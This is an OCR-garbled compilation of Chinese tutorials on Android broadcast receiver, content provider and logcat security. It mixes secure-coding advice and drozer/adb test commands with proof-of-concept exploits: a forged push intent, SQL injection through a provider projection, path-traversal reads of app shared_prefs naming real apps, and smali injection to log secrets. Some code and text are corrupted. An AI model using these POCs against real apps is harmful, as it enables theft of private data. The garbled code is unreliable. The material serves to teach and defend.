Intent- Intent-filter defined = defined | OK  |(Do not Use) | (Do not Use) 
Intent Filter Not OK OK (Do not Use) 
Defined 





1. 私有 广播 接收 器 设置 exported='false'， 并 且 不 配置 intent-filter。( 私 有 广播 接收 器 依然 能 
接收 到 同 UID 的 广播 ) 


«receiver android:name-".PrivateReceiver" android:exported="false" /> 
2， 对 接收 来 的 广播 进行 验证 


3. A app lal 49° 44% Fl protectionLevel='signature'#21£ # Xt 6 £ Æ A 3fapp 


Qui. 


4. 返回 结果 时 需 注 意 接 收 app 是 否 会 泄露 信息 


5 发 送 的 广播 包含 敏感 信息 时 需 指 定 广播 接收 器 ， 使 用 显 式 意图 或 者 setPackage(String 
packageName) 


6. sticky broadcast 粘 性 广播 中 不 应 包含 敏感 信息 


7. Ordered Broadcast 建 议 设 置 接收 权限 receiverPermission， 人 避免 恶意 应 用 设置 高 优先 级 
抢收 此 广播 后 并 执行 abortBroadcast() 方 法 。 


0x03 测试 方法 


1、 查 找 动态 广播 接收 器 | 反 编译 后 检索 registerReceiver()， 


dz> run app.broadcast.info -a android -i 


2、 查 找 静 态 广 播 接 收 器 : 反 编 译 后 查看 配置 文件 查找 广播 接收 器 组 件 ， 注 意 exported 属 性 
3、 查 找 发 送 广播 内 的 信息 检索 sendBroadcast 与 SendOrderedBroadcast， 注 意 setPackage 方 
法 与 receiverPermission 变 量 。 

发 送 测 试 广播 


adb shell: 

am broadcast -a MyBroadcast -n com.isi.vul_broadcastreceiver/.MyBroadCastReceiver 

am broadcast -a MyBroadcast -n com.isi.vul_broadcastreceiver/.MyBroadCastReceiver -es 
number 5556. 


drozer : 
dz> run app.broadcast.send --component com.package.name --action android.intent.action 
. XXX 


code : 

Intent i = new Intent(); 

ComponentName componetName = new ComponentName(packagename, componet); 
i.setComponent (componetName) ; 

sendBroadcast(i); 


接收 指定 广播 


public class Receiver extends BroadcastReceiver { 
private final String ACCOUNT_NAME = "account_name"; 
private final String ACCOUNT_PWD = "account_password"; 
private final String ACCOUNT_TYPE = "account_type"; 
private void doLog(Context paramContext, Intent paramIntent) 
{ 
String name; 
String password; 
String type; 


do 
{ 
name = paramIntent.getExtras().getString(ACCOUNT NAME); 
password = paramIntent.getExtras().getString(ACCOUNT PWD); 
type = paramIntent.getExtras().getString(ACCOUNT TYPE); 
} 
while ((TextUtils.isEmpty(name)) || (TextUtils.isEmpty(password)) || (TextUtil 


s.isEmpty(type)) || ((!type.equals("email")) && (!type.equals("cellphone")))); 
Log.i("name", name); 
Log.i("password", password); 
Log.i("type", type); 
j 


public void onReceive(Context paramContext, Intent paramIntent) 
if (TextUtils.equals(paramIntent.getAction(), "account")) 


doLog(paramContext, paramIntent); 


j 


0x04 & 4] 


案例 1 : 伪造 消息 代码 执行 


没有 对 消息 进行 安全 验证 ， 通 过 发 送 亚 意 的 消息 ， 攻击 者 可 以 在 
用 户 手 机 通知 栏 上 推送 任意 消息 ， 点 击 消息 后 可 以 利用 webview 组 件 盗 取 本 地 隐私 文件 和 执行 
任意 代码 。 


Intent i = new Intent(); 
i.setAction("com.baidu.android.pushservice.action.MESSAGE"); 
Bundle b - new Bundle(); 


try 
{ 


JSONObject jsobject = new JSONObject(); 

//1. phishing 

JSONObject custom_content_js = new JSONObject(); 

jsobject.put("title", "a big surprise!!!"); 

jsobject.put("description", ""); 

//jsobject.put("url", "http://bcscdn.baidu.com/netdisk/BaiduYun 5.1.0.apk"); 


jsobject.put("url", "http://drops.wooyun.org/webview.html"); 


JSONObject customcontent js - new JSONObject(); 
customcontent js.put("type", "1"); 

customcontent js.put("msg type", "resources push"); 
customcontent js.put("uk", "1"); 

customcontent js.put("shareId", "1"); 


jsobject.put("custom content", customcontent js); 


String cmd = jsobject.toString(); 
b.putByteArray("message", cmd.getBytes("UTF-8")); 
catch (Exception e) 


{ 


// TODO Auto-generated catch block 


e.printStackTrace(); 


案例 2 : 拒绝 服务 


尝试 向 广播 接收 器 发 送 不 完整 的 intent 比如 空 action 或 者 空 extra ° 


案例 3 : 敏感 信息 泄漏 


某 应 用 利用 广播 传输 用 户 账 号 密码 


Declaration GJ Console £D LogCat 52 =m 
Search for messages. Accepts Java regexes. Prefix with pid:, app:, tag: or text: to limit scope. verbose v H ll DI 4 

t 

i Level | Time PID TID Application Tag Text 
I 07-29 18:13:30.198 20271 20271 con.exampl d RN... eq. uu 
I -29 18:13:30.198 20271 20271 zon. example IED password zz! 





j| 2 07-29 18:13:30.198 20271 20271 -on. exanp MANN yoe email 


drops wooyin. oeg 
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public class ServerService extends Service { 


7, 
private void d() { 
// 
Intent v1 = new Intent(); 
v1.setAction("com.sample.action.server running"); 
vi.putExtra("local ip", v0.h); 
vi.putExtra("port", v0.i); 
vi.putExtra("code", v0.g); 
vi.putExtra("connected", v0.s); 
vi.putExtra("pwd predefined", v0.r); 
if (I!TextUtils.isEmpty(v0O.t)) 1 
vi.putExtra("connected usr", v0.t); 
} 
} 
this.sendBroadcast(v1); 
H 
接收 POC 
public class BcReceiv extends BroadcastReceiver { 
@Override 
public void onReceive(Context context, Intent intent){ 
String s = null; 
if (intent.getAction().equals("com.sample.action.server running"))( 
String pwd = intent.getStringExtra("connected"); 
S = "Airdroid => [" + pwd + "]/" + intent.getExtras(); 
} 
Toast.makeText(context, String.format("%s Received", s), 
Toast .LENGTH_SHORT ) .show(); 
} 
} 


修复 后 代码 ， 使 用 LocalBroadcastManager.sendBroadcast() 发 出 的 广播 只 能 被 app 自 身 广播 
接收 器 接收 。 


Intent intent = new Intent("my-sensitive-event"); 
intent.putExtra("event", "this is a test event"); 
LocalBroadcastManager.getInstance(this).sendBroadcast(intent); 


0x05 参考 


Android Broadcast Security 


http://www.jssec.org/dl/android_securecoding_en.pdf 
https://www.securecoding.cert.org/confluence/display/java/DRDO3- 
J.+Do+not+broadcast+sensitivet+information+using+an+implicittintent 
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0x00 科普 


所 有 的 应 用 程序 都 必然 涉及 数据 的 输入 与 输出 。 在 Android 系 统 中 ， 主 要 有 4 种 数据 存储 模 
式 : 


1. Sharedferences : Sharedferences 是 一 种 轻型 的 数据 存储 方式 ， 本 质 上 是 基于 XML 文件 
存储 key-value 键 值 对 数据 。 通 常用 来 存储 一 些 简单 的 配置 信息 ; 

2. File : 使 用 文件 进行 数据 存储 (SDCard) ; 

3. SQLite : SQLite 是 一 个 轻 量 级 的 数据 库 ， 存 储 结构 化 的 数据 ， 支 持 基 本 SQL 语 法 ， 是 常 
被 采用 的 一 种 数据 存储 方式 。Android 为 SQLite 提 供 了 一 个 名 为 SQLiteDatabase 的 类 ， 封 
装 了 一 些 CRUD 操 作 的 API ; 

4. Network : 使 用 基于 网 络 的 服务 获取 数据 。 


内 容 提 供 器 用 来 存放 和 获取 数据 并 使 这 些 数据 可 以 被 所 有 的 应 用 程序 访问 。 它 们 是 应 用 程序 
之 间 共 享 数据 的 唯一 方法 ; 不 包括 所 有 Android 软 件 包 都 能 访问 的 公共 储存 区 域 。 


Android 为 常见 数据 类 型 (音频 ， 视 频 ， 图 像 ， 个 人 联系 人 信息 ， 等 等 ) 装载 了 很 多 内 容 提供 
器 。 你 可 以 看 到 在 android.provider 包 里 列举 了 一 些 ， 你 还 能 查询 这 些 提供 器 包含 了 什么 数 
据 。 


当然 ， 对 某 些 敏感 内 容 提供 器 ， 必 须 获取 对 应 的 权限 来 读 取 这 些 数据 。 

如 果 你 想 公开 你 自己 的 数据 ， 你 有 两 个 选择 : 你 可 以 创建 你 自己 的 内 容 提 供 器 (一 个 
ContentProvider 子 类 ) 或 者 你 可 以 给 已 有 的 提供 器 添加 数据 ， 前 提 是 存在 一 个 控制 同样 类 型 
数据 的 内 容 提供 器 且 你 拥有 读 写 权 限 。 








APP APP APP 
Business Layer 
— na 
Binder&Ashmem 
Content Provider Data Access Layer 
Read& Write 
Internet 7 File Data Layer 


SQLite 
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0x01 知识 要 点 


参考 : http://developer.android.com/guide/topics/providers/content-providers.html 


Content URIs 


content URI 是 一 个 标志 provider 中 的 数据 的 URI - Content URI 中 包含 了 整个 provider 的 以 符 
号 表示 的 名 字 ( 它 的 authority ) 和 指向 一 个 表 的 名 字 ( 一 个 路 径 ) - 
当 你 调用 一 个 客户 端的 方法 来 操作 一 个 provider 中 的 一 个 表 ， 指 向 表 的 content URI 是 参数 之 


— 


content://com.example.transportationprovider/trains/122 


og We — Wurm 


A B drops.wooyun.org 
A. 标准 前 组 表明 这 个 数据 被 一 个 内 容 提供 器 所 控制 ， 它 不 会 被 修改 。 
B. URI 的 权限 部 分 ， 它 标识 这 个 内 容 提供 器 。 对 于 第 三 方 应 用 程序 ， 这 应 该 是 一 个 全 称 类 名 
(小 写 ) 以 确保 唯一 性 。 权 限 在 元 素 的 权限 属性 中 进行 声明 : 


<provider name=".TransportationProvider" 
authorities="com.example.transportationprovider" 
> 


C. 用 来 判断 请 求 数据 类 型 的 路 径 。 这 可 以 是 0 或 多 个 段 长 。 如 果 内 容 提供 器 只 暴露 了 一 种 数据 
类 型 (比如 ， 只 有 火车 ) ， 这 个 分 段 可 以 没有 。 如 果 提 供 器 暴露 若干 类 型 ， 包 括 子 类 型 ， 那 
它 可 以 是 多 个 分 段 长 ， 例 如 ， 提 供 "|land/bus", "land/train", "sea/ship", 和 "sea/submarine" 这 4 
个 可 能 的 值 。 

D. 被 请 求 的 特定 记录 的 |D， 如 果 有 的 话 。 这 是 被 请 求 记录 的 _ID 数值 。 如 果 这 个 请 求 不 局 限 
于 单个 记录 ， 这 个 分 段 和 尾部 的 斜 线 会 被 忽略 : 


content://com.example.transportationprovider/trains 


ContentResolver 


ContentResolver 的 方法 们 提供 了 对 存储 数据 的 基本 的 "CRUD" (增删 改 查 ) 功 能 


getIContentProvider() 
Returns the Binder object for this provider. 


delete(Uri uri, String selection, String[] selectionArgs) ----- abstract 
A request to delete one or more rows. 


insert(Uri uri, ContentValues values) 
Implement this to insert a new row. 


query(Uri uri, String[] projection, String selection, String[] selectionArgs, String s 
ortOrder) 
Receives a query request from a client in a local process, and returns a Cursor. 


update(Uri uri, ContentValues values, String selection, String[] selectionArgs) 
Update a content URI. 


openFile(Uri uri, String mode) 
Open a file blob associated with a content URI. 


Sql A 
sql 语句 拼接 


// 通过 连接 用 户 输 入 到 列 名 来 构造 一 个 选择 条 款 
String mSelectionClause = "var = " + mUserInput; 


参数 化 查询 


// 构造 一 个 带 有 占 位 符 的 选择 条 款 
String mSelectionClause = "var = ?"; 


权限 


下 面 的 元 素 请 求 对 用 户 词典 的 读 权限 : 


<uses-permission android:name="android.permission.READ_USER_DICTIONARY"> 


申请 某 些 protectionLevel-"dangerous" 的 权限 


<uses-permission android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE"/> Y 
请 权限 

«permission android:name-"com.huawei.dbank.v7.provider.DBank.READ DATABASE" android:pr 
otectionLevel="dangerous"></permission> 声明 权限 


android:protectionLevel 

normal: 默 认 值 。 低 风险 权限 ， 只 要 申请 了 就 可 以 使 用 ， 安 装 时 不 需要 用 户 确认 。 

dangerous : 像 WRITE_SETTING 和 SEND_SMS 等 权限 是 有 风险 的 ， 因 为 这 些 权 限 能 够 用 
来 重新 配置 设备 或 者 导致 话费 。 使 用 此 protectionLevel 来 标识 用 户 可 能 关注 的 一 些 权限 。 
Android 将 会 在 安装 程序 时 ， 警 示 用 户 关 于 这 些 权限 的 需求 ， 具 体 的 行为 可 能 依据 Android 版 
本 或 者 所 安装 的 移动 设备 而 有 所 变化 。 


signature : 这 些 权限 仅 授予 那些 和 本 程序 应 用 了 相同 密 钥 来 签名 的 程序 。 
signatureOrSystem: 与 signature 类 似 ， 除 了 一 点 ， 系 统 中 的 程序 也 需要 有 资格 来 访问 。 这 样 
允许 定制 Android 系 统 应 用 也 能 获得 权限 ， 这 种 保护 等 级 有 助 于 集成 系统 编译 过 程 。 


API 


Contentprovider 组 件 在 API-17 (android4.2) 及 以 上 版 本 由 以 前 的 exported 属性 默认 ture 2 
为 默认 false。 
Contentprovider 无 法 在 android2.2 (API-8) 申明 为 私有 。 


<!-- *** POINT 1 *** Do not (Cannot) implement Private Content Provider in Android 2.2 
(API Level 8) or earlier. --> 
«uses-sdk android:minSdkVersion="9" android: targetSdkVersion="17" /> 


关键 方法 


e public void addURI (String authority, String path, int code) 

e public static String decode (String s) 

e public ContentResolver getContentResolver() 

e public static Uri parse(String uriString) 

e public ParcelFileDescriptor openFile (Uri uri, String mode) 

e public final Cursor query(Uri uri, String[] projection,String selection, String[] 
selectionArgs, String sortOrder) 

e public final int update(Uri uri, ContentValues values, String where,String[] selectionArgs) 

e public final int delete(Uri url, String where, String[] selectionArgs) 

e public final Uri insert(Uri url, ContentValues values) 


0x02 content provider 分 类 


A content provider that cannot be used by another application, and 
Provider therefore is the safest content provider 
Provider large number of applications 
Provider by a trusted partner company. 
Provider applications 

A content provider that is basically private content provider, but 
Content Provider — 






Private Content Provider Public Content Provider Partner Content Provider In-house Content Provider 


这 个 老外 分 的 特别 细 ， 个 人 认为 就 分 private、public、in-house 差不多 够 用 。 


Temporary 
Content Provider 
drops wo 1 


0x03 安全 建议 


1. minSdkVersion 4 4& T 9 
.不 向 外 部 app 提 供 的 数据 的 私有 content providerit E exported-"false":& % 20 £F R% $E (4i 
api 小 于 17 时 更 应 注意 此 点 ) 
使 用 参数 化 查询 避免 注入 
内 部 app 通过 content provider 交换 数据 设置 protectionLevel=*“signature” 验 证 签名 
公开 的 content provider 确保 不 存储 敏感 数据 
Uri.decode() before use ContentProvider.openFile() 
提供 asset 文件 时 注意 权限 保护 


NO a Oo 


0x04 测试 方法 


1、 反 编译 查看 AndroidManifest.xml (drozer 扫 描 ) 文件 定位 content provider 是 否 导 出 ， 是 否 
置 权限 ， 确 定 authority 


drozer: 
run app.provider.info -a cn.etouch.ecalendar 


2、 反 编译 查找 path， 关 键 字 addURI、hook api 动态 监测 推荐 使 用 zjdroid 
、 确 定 authority 和 path 后 根据 业务 编写 POC、 使 用 drozer、 使 用 小 工具 Content Provider 
e * adb shell // 没有 对 应 权限 会 提示 错误 


adb shell: 

adb shell content query --uri <URI> [--user <USER_ID>] [--projection <PROJECTION>] [-- 
where <WHERE>] [--sort <SORT_ORDER>] 

content query --uri content://settings/secure --projection name:value --where "name='n 
ew_setting'" --sort "name ASC" 

adb shell content insert --uri content://settings/secure --bind name:s:new_setting --b 
ind value:s:new_value 

adb shell content update --uri content://settings/secure --bind value:s:newer_value -- 
where "name='new_setting'" 

adb shell content delete --uri content://settings/secure --where "name='new_setting'" 


drozer : 
run app.provider.query content://telephony/carriers/preferapn --vertical 
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案例 1 : 直接 暴 


private void getyouni() 


{ 
ine al = [Obs 
ContentResolver contentresolver = getContentResolver(); 
String[] projection = {"* from contacts--"}; 
Uri uri = Uri.parse("content://com.snda.youni.providers.DataStructs/message ex"); 
Cursor cursor - contentresolver.query(uri, projection, null, null, null); 
String text = ""; 


while (cursor.moveToNext()) 


{ 


text += cursor.getString(cursor.getColumnIndex("display name")) + '\n'; 


} 


Log.i("TEST", text); 


E3 案例 2 : 需 权 FR a haa 


米 聊 多 处 content provider 暴露 


«provider android:name=".providers.BuddyProvider" android:readPermission-z"com.xiaomi.c 
hannel.READ BUDDY" android:writePermission-"com.xiaomi.channel.WRITE BUDDY" android:ex 
ported-"true" android:authorities-"com.xiaomi.channel.providers.BuddyProvider" /> 


首先 权限 声明 如 下 : 


«permission android:name="com.xiaomi.channel.READ_BUDDY" /> 
«permission android:name-"com.xiaomi.channel.WRITE BUDDY" /> 
«uses-permission android:name-"com.xiaomi.channel.READ BUDDY" /» 


«uses-permission android:name-"com.xiaomi.channel.WRITE BUDDY" /» 
再 利用 案例 1 类 似 的 手法 ， 再 利用 SQL 注入 的 方式 能 够 访问 到 数据 库 中 其 他 的 表 


案例 3 : openFile 文 件 遍 历 


该 Provider 实 现 了 openFile() 接 口 ， 通 过 此 接口 可 以 访问 内 部 存储 app_webview 目录 下 的 数 
据 ， 由 于 后 台 未 能 对 目标 文件 地 址 进行 有 效 判断 ， 可 以 通过 "../" 实 现 目录 跨越 ， 实 现 对 任意 私 
有 数据 的 访问 


public void GJContentProviderFileOperations(){ 
try{ 


InputStream in = getContentResolver().openInputStream(Uri.parse("content://com 
.ganji.html5.localfile.1/webview/../../shared prefs/userinfo.xml")); 


ByteArrayOutputStream out = new ByteArrayOutputStream(); 
byte[] buffer = new byte[1024]; 
int n = in.read(buffer); 
while(n>0) { 
out.write(buffer, 9, n); 
n = in.read(buffer); 


Toast.makeText(getBaseContext(), out.toString(), Toast.LENGTH LONG).show() 


} 


}catch(Exception e){ 


debugInfo(e.getMessage()); 


Override openFile method 
错误 写法 1 : 


private static String IMAGE DIRECTORY = localFile.getAbsolutePath(); 
public ParcelFileDescriptor openFile(Uri paramUri, String paramString) 
throws FileNotFoundException { 


File file - new File(IMAGE DIRECTORY, paramUri.getLastPathSegment()); 


return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE READ ONLY); 
} 


错误 写法 2 : URI.parse() 


private static String IMAGE DIRECTORY = localFile.getAbsolutePath(); 
public ParcelFileDescriptor openFile(Uri paramUri, String paramString) 
throws FileNotFoundException { 


File file = new File(IMAGE_DIRECTORY, Uri.parse(paramUri.getLastPathSegment()).get 
LastPathSegment()); 


return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE READ ONLY); 
H 


POC1: 


String target = "content://com.example.android.sdk.imageprovider/data/" + "..%2F..%2F. 
.%2Fdata%2Fdata%2Fcom.example.android.app%2Fshared_prefs%2FExample. xml"; 


ContentResolver cr = this.getContentResolver(); 
FileInputStream fis = (FileInputStream)cr.openInputStream(Uri.parse(target)); 


byte[] buff = new byte[fis.available()]; 
in.read(buff); 


POC2 : double encode 


String target = "content://com.example.android.sdk.imageprovider/data/" + 
"%252E%252E%252F%252E%252E%252F%252E%252E%252Fdata%252Fdata%252Fcom.example.android.ap 
p%252Fshared_prefs%252FExample. xml"; 


ContentResolver cr = this.getContentResolver(); 
FileInputStream fis = (FileInputStream)cr.openInputStream(Uri.parse(target)); 


byte[] buff = new byte[fis.available()]; 
in.read(buff); 


解决 方法 Uri.decode() 


private static String IMAGE DIRECTORY = localFile.getAbsolutePath(); 
public ParcelFileDescriptor openFile(Uri paramUri, String paramString) 
throws FileNotFoundException { 
String decodedUriString = Uri.decode(paramUri.toString()); 
File file = new File(IMAGE DIRECTORY, Uri.parse(decodedUriString).getLastPathSegme 
nt()); 
if (file.getCanonicalPath().indexOf(localFile.getCanonicalPath()) != 0) ( 
throw new IllegalArgumentException(); 
} 


return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE READ ONLY); 
} 


Android Content Provider Security 


0x06 参考 


https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageld=111509535 
http://www.jssec.org/dl/android_securecoding_en.pdf 
http://developer.android.com/intl/zh-cn/reference/android/content/ContentProvider.html 
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原文 by RZA 


0x00 科普 


development version : 开发 版 ， 正 在 开发 内 测 的 版 本 ， 会 有 许多 调试 日 志 。 

release version : 发 行 版 ， 签 名 后 开发 给 用 户 的 正式 版 本 ， 日 志 量 较 少 。 

android.util.Log : 提供 了 五 种 输出 日 志 的 方法 

Log.e(), Log.w(), Log.i(), Log.d(), Log.v() 

ERROR, WARN, INFO, DEBUG, VERBOSE 

android.permission. READ LOGS:app 读 取 日 志 权 限 ，android 4.1 之 前 版 本 通过 申请 

READ LOGS 权限 就 可 以 读 取 其 他 应 用 的 log 了 。 但 是 谷歌 发 现 这 样 存在 安全 风险 ， 于 是 
android 4.1 以 及 之 后 版 本 ， 即 使 申请 了 READ LOGS 权限 也 无 法 读 取 其 他 应 用 的 日 志 信 息 
了 。4.1 版 本 中 Logcat 的 签名 交 为 “signature|lsystem|development” 了 ， 这 意味 着 只 有 系统 签 
名 的 app 或 者 root 权限 的 app 才能 使 用 该 权限 。 普 通用 户 可 以 通过 ADB 查看 所 有 日 志 。 


0x01 测试 


测试 方法 是 非常 简单 的 ， 可 以 使 用 sdk 中 的 小 工具 monitor 或 者 ADT 中 集成 的 logcat 来 查看 日 
志 ， 将 工具 目录 加 入 环境 变量 用 起 来 比较 方便 。 当 然 如 果 你 想 更 有 bigger 也 可 以 使 用 adb 
logcat。android 整体 日 志 信息 量 是 非常 大 的 ， 想 要 高 效 一 些 就 必须 使 用 filter 来 过 滤 一 些 无 关 
言 息 ，filter 是 支持 正则 的 ， 可 以 做 一 些 关 键 字 匹配 比如 password ` token ` email 等 。 本 来 准 
备 想 做 个 小 工具 自动 化 收集 ， 但 是 觉得 这 东西 略 鸡肋 没 太 大 必要 ， 故 本 文 的 重点 也 是 在 如 何 
安全 地 使 用 logcat 方面 。 

@ - iem 


Logcat Message Filter Settings 


Filter logcat messages by the source's tag, pid or minimum log level. 
Empty fields will match all messages. 


Filter Name: Test 


by Log Tag: 
by Log Message: 去 持 正则 
by PID: pid 定 位 app 





by Application Name: 


| 

| 

| 

| 

| 

| 

| 

by Log Level: |verbose v | 
| 

Ganka Cancel | 


E —— 








r — ————— — 


Ge SER: CAWindowsWsystem32Xcmd.exe = Lo 


iC: Wsers \Magic > 
C:\Users\Magic>adb shell 
shell@android:/ $ logcat -d ActivityManager:I *:$ 
logcat -d ActivityManager:I *:$ 
A beginning of /dev/log/main 
Fe beginning of /dev/log/system 
lI/ActivityManager 292@>: Killing proc 382@3:com.sec.android.SimpleVidget/u@ail@1 
28: force stop com.sec.android.SimpleWidget 
W/ActivityManager¢ 2928): mDUFSHe lper.re lease > 
WW /Act ivit yManager< 2926>: mDUFSHe lper.acquire (> 
I/ActivityManager( 292@>: Process com.sec.smartcard.pinservice Cpid 2874@> Cadj 
15> has died. 
I/ActivityManager( 292@>: Process com.sec.android.gallery3d Cpid 26885) Cadj 15> 
has died. 
I/ActivityManager( 292@>: Process tu.pps.mobile (pid 27597> Cadj 15> has died. 
l/ActivityManager¢ 292@>: Process com.sec.android.service.cm Cpid 27956) Cadj 15 
> has died. 
I/ActivityManager( 2920): Process -osp.app.signin Cpid 27487) Cadj 15> has di 
ed. 
I/ActivityManager< 2920): Process -android.musicfx pid 26836) 《adj 15> has d 
ied. 





I/ActivityManager( 292@>: Process -sec.android.app.samsungapps.una2 Cpid 2445 
8> <Cadj 15> has died. 

l/ActivityManager¢ 292@>: Process -sec.pcw.device Cpid 2607@> Cadj 15> has di 
led. 





当然 也 可 以 自己 写 个 app 在 直接 在 手机 上 抓 取 logcat， 不 过 前 面 提 到 因为 android 系 统 原 因 如 
果 手 机 是 android4.1 或 者 之 后 版 本 ， 即 使 在 manifest.xml 中 加 入 了 如 下 申请 也 是 无 法 读 取 到 其 
他 应 用 的 log 的 。 


«uses-permission android:name="android.permission.READ_LOGS"/> 





Button 


—— beginning of /dev/log/main 


root 权限 可 以 随便 看 logcat， 所 以 "logcat 信息 泄露 "漏洞 因 谷 歌 在 4.1 上 的 动作 变 得 很 鸡肋 了 。 


So secu og 26c0 8 ** G 07:31 
LogCapture 
Button 


— beginning of /dev/log/system 
\/ActivityManager( 596): Start proc com.ijinshan.browser_fast:remote for service 
com.ijinshan.browser. fast/com.baidu.location.f: pid2 29172 uid 10049 gids- (50049, 
3003, 1028, 1015) 
/ActivityManager( 596): Process com .ijinshan.browser. fast:remote (pid 29172) has died. 
\/ActivityManager( 596): Start proc com.google.android.gallery3d for service 
com.google.android.gallery3d/com.google.android.picasasync.PicasaSyncService: 
pid=30359 uid2 10040 gids={50040, 3003, 1028, 1015} 
l/ActivityManager( 596): Start proc com.google.android.music:main for service 
com.google.android.music/.sync.SyncAdapterService: pid=30383 uid 10058 
gids-(50058, 3003, 1028, 1015) 
\/ActivityManager( 596): Delay finish: com.wandoujia.phoenix2.usbproxy/ 
com.wandoujia.pmp.receivers.AppChangedReceiver 
\/ActivityManager( 596): Resuming delayed broadcast 
\/ActivityManager( 596): Killing 26462:com.qihoo.padbrowser/u0a51 (adj 15): empty for 
1809s 
\/ActivityManager( 596): Delay finish: com.google.android.gms/ 
app.receiver.SystemBroadcastReceiver 
\/ActivityManager( 596): Resuming delayed broadcast 
\/ActivityManager( 596): Delay finish: com, wandoujia.phoenix2.usbproxy/ 
com.wandoujia.pmp.receivers.AppChangedReceiver 
\/ActivityManager( 596): Resuming delayed broadcast 
\/ActivityManager( 596): Delay finish: com.baidu.appsearch/ 
.myapp.helper.UpdateReceiver 
l/ActivityManager( 596): Resuming delayed broadcast 
\/ActivityManager( 596): Waited long enough for: ServiceRecord(42d05080 u0 
com.google.android.gms/.checkin.CheckinService) 
l/ActivityManager( 596): Waited long enough for: ServiceRecord{43058be0 u0 
com.google.android.gms/.playlog.uploader.UploaderService) 
\/ActivityManager( 596): Idle maintenance over *6h51m44s127ms low RAM for 
*2h13m34s467ms 
\/ActivityManager( 596): Delay finish: com.baidu.appsearch/ 
myapp.helper.UpdateReceiver 
\/ActivityManager( 596): Resuming delayed broadcast 
l/ActivityManager( 596): Start proc eu.chainfire.supersu for broadcast 
eu.chainfire.supersu/.UserPresentReceiver: pid=31230 uid- 10078 gids-(50078) 
l/ActivityManager( 596): Start proc com.android.defcontainer for service 
com.android.defcontainer/.DefaultContainerService: pid=31430 uid- 10005 gids={50005, 
1028, 1015, 1023, 2001, 1035) 
W/ActivityManager( 596); No content provider found for permission revoke: file:///data/ 
local/tmp/mq..1415101013.apk 
W/ActivityManager( 596): No content provider found for permission revoke; file:///data/ 
local/tmp/mq_1415101013.apk 
l/ActivityManager( 596): Force stopping org.wooyun.logcapture appid= 10098 user=-1: 
update pkg 


(II Stu Nr y emm (pP MEA uum uc lb .wewicetiiedueNduucewtet wh wenn ees 





0x02 smali’= Alogcat 


将 敏感 数据 在 加 密 前 打印 出 来 就 是 利用 静态 smali 注入 插入 了 logcat 方法 。 使 用 APK 反 编 译 
后 用 smali 注入 非常 方便 ， tek ALLE eects ， 新 手 建议 不 添加 寄存 
直接 使 用 已 有 的 寄存 器 


Android Logcat Security 


invoke-static {vO, v0}, Landroid/util/Log; ->e(Ljava/lang/String;Ljava/lang/String; )I 

















= Ss L E SRY, ee -— | = LED magIyv-7 um rr, | we ous 
« |Staet.java | Wainkctivity$1. smali 
64 .local v0, “str":Ljava/lang/String: ^ 
6s sget-object v1, Ljava/lang/System;-»ocut:Ljava/io/PrintStream: 
TE y »yun hiwoowvur 6€ — 
& 67 invoke-virtual (vl, vO), Ljava/io/PrintStream; ->printin |Ljava/lang/String:)|V 
68 | 
-* 
dx 69 const-string vl, "password" 
hivooyun 70 一 
lani fest. xal 71 invoke-virtual (v0, vl), Ljava/lang/String:->equals(Ljava/lang/Object:)Z 
ml 72 
L 73 move-resuld vi 
74 = 
75 if-eqz vi, |cond 0 
oid 76 
77 iget-cbject p1, pO, Lorg/wooyun/hiwooyun/MainActiívirty$:;:-»thís$^:Lorg/wooyun/hiwooyun/MainActivi 
coyun 78 = 
D bivooyun 79 # getter fori Lorg/wooyun/hiwooyun/MeinActivity:-»myText:Landroid/widget/TextView: J 
S Baildconfig s 80 invoke-statid (v1), Lorg/wooyun/hiwooyun/MainActivity;->access$1 (Lorg/wooyun/hiwooyun/MainActivd|~ 
S, WaishctivityS 81 - 
7,8; Nainkctivity. « 82 move-result-oMject vi 
Ss Efattr. smali 23 
B Bfdinen. snali 84 const-string vp, "\u8f9S\u5165\u6b63\u786e" 
BI Efdr sasble sn es B 
m BEid. snali 86 invoke-virtual(Y vl, v2), Landroid/widget/TextView: -»setText(Ljava/lang/CharSequence:)V 
S Eflayout. mal: 87 
8) Bfnenu spali ae invoke-static (v0, vi Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I 
5 BEstring mal 89 L 
上 图 BEstyle. smali 90 iget-object v1, pO, Lorg/wooyun/hiwooyun/MainActivityS.:-»thisS$ : Lorg/wooyun/hiwooyun/MainActiv2 
S R smali 91 E 
92 invoke-virtual (vl), Lorg/wooyun/hiwocyun/MainActivity: -»getApplicationContext |) Landroid/content * 
* lun —— ——— n" ; R 
claration G) Console ED LogCat :: [7] Lint Warnings 3 
Search for messages. Accepts Java regexes. Prefix with pid: app:, tag: or text: to limit scope. verbose ~ WE (Gra) 
L.|Wme nD TID Application Tag Jet 
D 11-04 12:56:25.122 26675 26675 org.wooyun.hiwooyun zjdroid-spimonitor-org... Invoke android.app.ContextIrpl 
D 11-04 12:56:25.122 26675 26675 org.wooyun.hiíwooyun zjdroid-apimenitor-org... Register BroatcastReceiver 
D 11-04 12:56:25.122 26675 26675 org.wooyun.hiwooyun zjdroid-apimonitor-org... The BroatcastReceiver Classliar 
astReceiver 
D 11-04 12:56:25.122 26675 26675 org.wooyun.híwooyun zjdroid-apimenitor-org... Intent Action = [com.zjdroid.i 
D 11-04 12:56:25.152 26675 26675 org.wooyun.hiwooyun dailvikvm JII code cache reset in 0 us ( 
D 11-04 12:56:25.152 26675 26675 org-wooyun.hiwooyun dalvilvm GC FOR ALLOC freed 446K, 3% fr 
D 11-04 12:56:25.182 26675 26675 org.wooyun.hiwooyun dalvikvm GC FOR ALLOC freed 9K, 3$ free 
D 11-04 12:56:25.202 26615 26675 org.wooyun.hiwooyun dalvikvm GC FOR ALLOC freed SK, 3% free 
I 11-04 12:56:25.232 26675 26675 org. wooyun.hiwooyun Adreno-EGL «qeglDrvAPI eglinitialize: 320? 
43aeb6dSeiSed4b30ddbDate: 11/C 
D 11-04 12:56:25.252 26675 26675 org.wooyun.hiwooyun OpenGLRenderer Enabling debug mode 0 
D 11-04 12:56:30.412 26675 26675 org.wooyun.hiwooyun zjdroid-apimonitor-org... Invoke android.content.Content 
D 11-04 12:56:30.412 26675 26675 org.wooyun.hiwooyun zjdroid-spimonitor-org... content://settings/system 
I 11-04 12:56:37.952 26675 26675 org.wooyun.hiwooyun Systen.cut 123456 





